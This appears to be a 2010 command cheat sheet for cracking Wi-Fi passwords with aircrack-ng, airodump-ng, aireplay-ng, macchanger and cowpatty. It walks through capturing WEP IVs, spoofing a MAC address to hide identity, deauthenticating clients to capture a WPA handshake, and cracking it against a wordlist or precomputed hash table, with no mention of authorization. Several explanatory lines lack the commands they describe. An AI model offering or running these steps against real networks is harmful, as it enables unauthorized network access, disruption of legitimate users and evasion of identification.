2010-06-17 21:42
(Shows connected network adapters/devices)
airodump-ng wlan0
(Shows available networks on the wlan0 network adapter - Your network adapter name may differ)
airodump-ng -w passcode --bssid 00:18:39:7C:3F:D6 -C 6 wlan0
(Writes intercepted/sniffed IV's to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter)
(Shows files in the current directory)
aircrack-ng -a 1 -b 00:18:39:7C:3F:D6 FILENAME.cap
(Cracks the IV's in the Cab file created via the airodump-ng command. The Mac Address specified should be that of the Access Point your trying to crack
(Shows connected network adapters/devices)
macchanger -s [INTERFACE]
(Shows our current Mac Address)
macchanger -m [DESIRED MAC] [INTERACE]
(Spoofs our Mac Address to hide our identity)
airodump-ng [INTERFACE]
(Shows available networks on your network adapter)
airodump-ng --bssid [Mac of Router] -w [FILENAME] -c [CHANNEL] [ADAPTER]
(Writes intercepted/sniffed IV's to a CAP document. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what's displayed for you. Same goes for the network adapter. This will only be useful if a Handshake is done)
aireplay-ng -0 15 -a [MAC OF ROUTER] -c [MAC OF SYSTEM ON NETWORK] [ADAPTER]
(Deauthenticates client and obtains a handshake)
aircrack-ng -e [ESSID - Name of network] -w [WORDLIST] [FILENAME.cap]
(References the hash obtained during the Hand-Shake with a specified wordlist.)
cd /pentest/wireless/cowpatty/
(To change to the CowPatty directory)
./genpmk -s [ESSID - Name of network] -f [WORDLIST] -d [FILENAME]
(Creates a Hash-Table specific to the ESSID)
./cowpatty -s [ESSID - Name of network] -d [HASH FILENAME] -r [FILENAME.cap]
(Attempts to crack the password using the generated Hash-Table)